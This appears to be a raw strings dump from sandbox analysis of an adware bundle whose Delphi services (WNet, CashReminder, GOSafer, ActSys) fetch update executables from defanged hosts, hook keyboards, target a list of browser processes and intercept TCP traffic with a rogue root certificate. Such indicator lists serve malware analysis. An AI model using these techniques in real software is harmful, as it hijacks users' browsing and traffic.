t.com/index.php /ta /ci 9664 /i MyBestOffersTodayBR
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\nsWeb.dll
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp
n%D,3
GetProcessHeap
OLEAUT32.dll
CreateURLMoniker
urlmon.dll
WININET.dll
nsWeb.dll
ShowWebInPage
MSHTML.DLL
1 1$1(1,1014181
t%SSj
GetWindowsDirectoryW
RegEnumKeyExW
RegEnumKeyExA
RegCreateKeyExW
RegOpenKeyExW
RegDeleteKeyW
registry.dll
_CopyKey
_CreateKey
_DeleteKey
_DeleteKeyEmpty
_KeyExists
_MoveKey
_RestoreKey
_SaveKey
.reloc
System.dll
callback%d
@.reloc
8%ud'
.bu)o&
g\=.jeD
nscD154.tmp
pData\Local\Temp\nscD154.tmp
00663296
c:\%original file name%.exe
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt
%original file name%.exe
ers\"%CurrentUserName%"\AppData\Local\Temp\nsmD142.tmp
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\
-2046754816
-2147410511
Nullsoft Install System v2.46
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
%s /s "%s"
regedit.exe
REG_KEY
%s%s%s
x,
=hex(%x):
=dword:x
="%s"
[%s\%s]
[-%s\%s]
Windows Registry Editor Version 5.00
5.9.1.7
%original file name%.exe_1512_rwx_003F4000_00001000:
callback%d
g3CvT78vSMa0N0LPai7Qvt_mb_1.exe_1884:
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|/":
ShowWebInPopUp
pData\Local\Temp\nssD4BE.tmp\nsWeb.dll
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssD4BE.tmp\nsWeb.dll
%Program Files%
\nsWeb.dll
hXXp://goo.gl/Bw14Po
$$\wininit.ini
@.reloc
n%D,3
GetProcessHeap
OLEAUT32.dll
CreateURLMoniker
urlmon.dll
WININET.dll
nsWeb.dll
ShowWebInPage
MSHTML.DLL
1 1$1(1,1014181
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssD4BE.tmp
nssD4BE.tmp
:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssD4BE.tmp
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvt_mb_1.exe
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\O15O8WbPqkjNWDUfU8L4Mr8GpVb15O8WbPqkjNWDUfU8L4Mr8GpVb
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt
g3CvT78vSMa0N0LPai7Qvt_mb_1.exe
ers\"%CurrentUserName%"\AppData\Local\Temp\nscD4AC.tmp
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\
8.9.3.9
WNet.exe_3080:
.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
Proportional
MAPI32.DLL
TURLAction
HelpKeywordp
TURLDownloadStatus
dsBeginSyncOperation
dsEndSyncOperation
dsFilterReportMIMEType
TDownLoadURL
URLMON.DLL
URLDownloadToFileA
OnKeyDown
OnKeyPress
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeywordT
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
Password
OnExecutepWE
127.0.0.1
255.0.0.0
ServiceExecute
\P_CheckUpdate.txt
NOVA UPDATE DISPONIVEL! URL:
\po_update.exe
hXXp://VVV.brsoftwarellc.com/services/rules.txt?dummy=
hXXp://VVV.brsoftwarellc.com/services/update.php?v=
&key=
\P_RuleList.txt
[E] ProductKey :
[N] ProductKey :
cmd.exe /c net start WNet
cmd.exe /c net stop WNet
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
ReportEventA
RegFlushKey
RegCreateKeyExA
WinExec
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
wsock32.dll
nfapi.dll
nf_tcpDisableFiltering
nf_setTCPTimeout
nf_tcpClose
nf_tcpPostReceive
nf_tcpPostSend
nf_tcpSetConnectionState
psapi.dll
ProtocolFilters.dll
5l6O6W6
?!?%?)?-?1?5?9?=?
5%6x6
1 1$1(1,1014181
0&0.080=0
2%3)3-31383
; ;$;(;,;0;4;8;
1#1'1 1/13171;1
=!=,=7=?=_=
5 5$5(5,505
3 3$3(3,3
3 3$3(3,3034383
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
I<.os8>
KWindows
UrlMon
OnExecute
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Error downloading URL: %s
Unable to load %s"Unable to find a Table of Contents
Alt Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation
CashReminder.exe_1108:
.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
Proportional
MAPI32.DLL
TURLAction
HelpKeywordp
TURLDownloadStatus
dsBeginSyncOperation
dsEndSyncOperation
dsFilterReportMIMEType
TDownLoadURL
URLMON.DLL
URLDownloadToFileA
OnKeyDown
OnKeyPress
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeywordT
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
Password
OnExecutepWE
content-security-policy-report-only
127.0.0.1
255.0.0.0
ServiceExecute
\P_StoreList.txt
\P_CheckUpdate.txt
\cr_update.exe
hXXp://VVV.related.deals/services/rules?dummy=
hXXp://VVV.related.deals/services/stores?dummy=
hXXp://VVV.related.deals/services/update/
\P_RuleList.txt
[N] ProductKey :
cmd.exe /c net start CashReminder
cmd.exe /c net stop CashReminder
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
ReportEventA
RegFlushKey
RegCreateKeyExA
WinExec
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
wsock32.dll
nfapi.dll
nf_tcpDisableFiltering
nf_setTCPTimeout
nf_tcpClose
nf_tcpPostReceive
nf_tcpPostSend
nf_tcpSetConnectionState
psapi.dll
ProtocolFilters.dll
5l6O6W6
?!?%?)?-?1?5?9?=?
5%6x6
1 1$1(1,1014181
0&0.080=0
2%3)3-31383
; ;$;(;,;0;4;8;
1#1'1 1/13171;1
=!=,=7=?=_=
5 5$5(5,505
3 3$3(3,3
3 3$3(3,3034383
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
KWindows
UrlMon
OnExecute
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Error downloading URL: %s
Unable to load %s"Unable to find a Table of Contents
Alt Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
Service failed on %s: %s
Unsupported clipboard format
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error reading %s%s%s: %s
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to get data for '%s'
Failed to set data for '%s'
Failed to set data for '%s'
Resource %s not found
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Property %s does not exist
Thread creation error: %s
Thread creation error: %s
Thread Error: %s (%d)
Thread Error: %s (%d)
Class %s not found
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot create file "%s". %s
Cannot open file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
List index out of bounds (%d)
Ancestor for '%s' not found
Ancestor for '%s' not found
Cannot assign a %s to a %s
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
%s (%s, line %d)
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
Operation not supported
External exception %x
External exception %x
Interface not supported
Interface not supported
Invalid pointer operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
!'%s' is not a valid integer value
I/O error %d
I/O error %d
Integer overflow Invalid floating point operation
Integer overflow Invalid floating point operation
GOSafer.exe_3284:
.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
%s[%d]
%s_%d
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
Proportional
MAPI32.DLL
TURLAction
HelpKeywordp
TURLDownloadStatus
dsBeginSyncOperation
dsEndSyncOperation
dsFilterReportMIMEType
TDownLoadURL
URLMON.DLL
URLDownloadToFileA
OnKeyDown
OnKeyPress
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeywordT
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
Password
OnExecutepWE
127.0.0.1
255.0.0.0
ServiceExecute
\G_CheckUpdate.txt
NOVA UPDATE DISPONIVEL! URL:
\gs_update.exe
hXXp://VVV.gosaferllc.com/services/rules.txt?dummy=
hXXp://VVV.gosaferllc.com/services/update.php?v=
&key=
\G_RuleList.txt
[E] ProductKey :
[N] ProductKey :
cmd.exe /c net start GOSafer
cmd.exe /c net stop GOSafer
c:\log.log
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
ReportEventA
RegFlushKey
RegCreateKeyExA
WinExec
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
wsock32.dll
nfapi.dll
nf_tcpDisableFiltering
nf_setTCPTimeout
nf_tcpClose
nf_tcpPostReceive
nf_tcpPostSend
nf_tcpSetConnectionState
psapi.dll
ProtocolFilters.dll
KWindows
UrlMon
OnExecute
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Error downloading URL: %s
Unable to load %s"Unable to find a Table of Contents
Alt Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation
ActSys.exe_3756:
.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
%s[%d]
%s_%d
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
Proportional
MAPI32.DLL
TURLAction
HelpKeyword
TURLDownloadStatus
dsBeginSyncOperation
dsEndSyncOperation
dsFilterReportMIMEType
TDownLoadURL
URLMON.DLL
URLDownloadToFileA
OnKeyDown
OnKeyPress
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreviewx4D
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
Password
OnExecute
iexplore.exe
firefox.exe
chrome.exe
safari.exe
opera.exe
netscape.exe
torch.exe
seamonkey.exe
k-meleon.exe
konqueror.exe
maxthon.exe
flock.exe
lunascape.exe
amaya.exe
midori.exe
kidzui.exe
rockmelt.exe
sbrowser.exe
slimbrowser.exe
kidrocket.exe
epic.exe
ironbrowser.exe
comodo.exe
comododragon.exe
crazybrowser.exe
arora.exe
shenzbrowser.exe
enigmabrowser.exe
avant.exe
avantbrowser.exe
orca.exe
xbbrowser.exe
xbrowser.exe
sleipnir.exe
spacetime.exe
3dbrowse.exe
bitty.exe
java.exe
grail.exe
lynx.exe
twb.exe
tt.exe
pinkbrowser.exe
nuke.exe
acoo.exe
palemoon.exe
slimboat.exe
dooble.exe
menubox.exe
chromium.exe
ultrabrowser.exe
zac.exe
kylo.exe
morequick.exe
wyzo.exe
xombrero.exe
qupzilla.exe
cometbird.exe
qtweb.exe
deepnet.exe
xtravo.exe
smartbro.exe
jumpto.exe
weblock4kids.exe
weblock.exe
comodoice.exe
srwareiron.exe
srware.exe
coolnovo.exe
cool.exe
qup.exe
browseme.exe
swiftfox.exe
omniweb.exe
omni.exe
spark.exe
bobrowser.exe
crossbrowser.exe
crossbrowse.exe
content-security-policy-report-only
127.0.0.1
255.0.0.0
ServiceExecute
\P_CheckUpdate.txt
NOVA UPDATE DISPONIVEL! URL:
\nj_update.exe
hXXp://VVV.ninjasoftwarellc.com/services/rules.txt?dummy=
hXXp://VVV.ninjasoftwarellc.com/services/update.php?v=
&key=
\P_RuleList.txt
[E] ProductKey :
[N] ProductKey :
cmd.exe /c net start ActSys
cmd.exe /c net stop ActSys
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
ReportEventA
RegFlushKey
RegCreateKeyExA
WinExec
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
wsock32.dll
nfapi.dll
nf_tcpDisableFiltering
nf_setTCPTimeout
nf_tcpClose
nf_tcpPostReceive
nf_tcpPostSend
nf_tcpSetConnectionState
psapi.dll
ProtocolFilters.dll
pfc_setRootSSLCertSubject
KWindows
UrlMon
OnExecute
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Error downloading URL: %s
Unable to load %s"Unable to find a Table of Contents
Alt Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation
DesProtetor.exe_4032:
.idata
.idata
.rdata
.rdata
P.reloc
P.reloc
P.rsrc
P.rsrc
kernel32.dll
kernel32.dll
Windows
Windows
MSWHEEL_ROLLMSG
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
oleaut32.dll
EVariantBadIndexError
EVariantBadIndexError
ssShift
ssShift
htKeyword
htKeyword
EInvalidOperation
EInvalidOperation
u%CNu
u%CNu
%s[%d]
%s[%d]
%s_%d
%s_%d
EInvalidGraphicOperation
EInvalidGraphicOperation
USER32.DLL
USER32.DLL
comctl32.dll
comctl32.dll
uxtheme.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s
Proportional
Proportional
MAPI32.DLL
MAPI32.DLL
TURLAction
TURLAction
HelpKeywordp
HelpKeywordp
TURLDownloadStatus
TURLDownloadStatus
dsBeginSyncOperation
dsBeginSyncOperation
dsEndSyncOperation
dsEndSyncOperation
dsFilterReportMIMEType
dsFilterReportMIMEType
TDownLoadURL
TDownLoadURL
URLMON.DLL
URLMON.DLL
URLDownloadToFileA
URLDownloadToFileA
OnKeyDown
OnKeyDown
OnKeyPress
OnKeyPress
OnKeyUp
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
JumpID("","%s")
TKeyEvent
TKeyEvent
TKeyPressEvent
TKeyPressEvent
HelpKeywordT
HelpKeywordT
crSQLWait
crSQLWait
%s (%s)
%s (%s)
imm32.dll
imm32.dll
AutoHotkeys
AutoHotkeys
ssHotTrack
ssHotTrack
TWindowState
TWindowState
poProportional
poProportional
TWMKey
TWMKey
KeyPreview
KeyPreview
WindowState
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
vcltest3.dll
User32.dll
User32.dll
Password
Password
OnExecutepWE
OnExecutepWE
127.0.0.1
127.0.0.1
255.0.0.0
255.0.0.0
ServiceExecute
ServiceExecute
\P_CheckUpdate.txt
\P_CheckUpdate.txt
NOVA UPDATE DISPONIVEL! URL:
NOVA UPDATE DISPONIVEL! URL:
\po_update.exe
\po_update.exe
hXXp://VVV.brsoftwarellc.com/services/rules.txt?dummy=
hXXp://VVV.brsoftwarellc.com/services/rules.txt?dummy=
hXXp://VVV.brsoftwarellc.com/services/update.php?v=
hXXp://VVV.brsoftwarellc.com/services/update.php?v=
&key=
&key=
\P_RuleList.txt
\P_RuleList.txt
[E] ProductKey :
[E] ProductKey :
[N] ProductKey :
[N] ProductKey :
cmd.exe /c net start SaveSys
cmd.exe /c net start SaveSys
cmd.exe /c net stop SaveSys
cmd.exe /c net stop SaveSys
user32.dll
user32.dll
GetKeyboardType
GetKeyboardType
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
ReportEventA
ReportEventA
RegFlushKey
RegFlushKey
RegCreateKeyExA
RegCreateKeyExA
WinExec
WinExec
GetCPInfo
GetCPInfo
version.dll
version.dll
gdi32.dll
gdi32.dll
SetViewportOrgEx
SetViewportOrgEx
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
MapVirtualKeyA
MapVirtualKeyA
LoadKeyboardLayoutA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyboardLayout
GetKeyState
GetKeyState
GetKeyNameTextA
GetKeyNameTextA
EnumWindows
EnumWindows
EnumThreadWindows
EnumThreadWindows
ActivateKeyboardLayout
ActivateKeyboardLayout
wsock32.dll
wsock32.dll
nfapi.dll
nfapi.dll
nf_tcpDisableFiltering
nf_tcpDisableFiltering
nf_setTCPTimeout
nf_setTCPTimeout
nf_tcpClose
nf_tcpClose
nf_tcpPostReceive
nf_tcpPostReceive
nf_tcpPostSend
nf_tcpPostSend
nf_tcpSetConnectionState
nf_tcpSetConnectionState
psapi.dll
psapi.dll
ProtocolFilters.dll
ProtocolFilters.dll
5l6O6W6
5l6O6W6
?!?%?)?-?1?5?9?=?
?!?%?)?-?1?5?9?=?
5%6x6
5%6x6
1 1$1(1,1014181
1 1$1(1,1014181
0&0.080=0
0&0.080=0
2%3)3-31383
2%3)3-31383
; ;$;(;,;0;4;8;
; ;$;(;,;0;4;8;
1#1'1 1/13171;1
1#1'1 1/13171;1
=!=,=7=?=_=
=!=,=7=?=_=
5 5$5(5,505
5 5$5(5,505
3 3$3(3,3
3 3$3(3,3
3 3$3(3,3034383
3 3$3(3,3034383
333333333333333333
333333333333333333
33333833
33333833
3333339
3333339
3333333333333338
3333333333333338
:*"*"$3338
:*"*"$3338
3333333
3333333
33333333
33333333
33333333333
33333333333
3333333333338
3333333333338
33338?383
33338?383
333333333333
333333333333
:*3:"$3338
:*3:"$3338
333333333333333
333333333333333
A.mi*#9$
A.mi*#9$
KWindows
KWindows
UrlMon
UrlMon
OnExecute
OnExecute
No help keyword specified.
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Error downloading URL: %s
Unable to load %s"Unable to find a Table of Contents
Alt Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
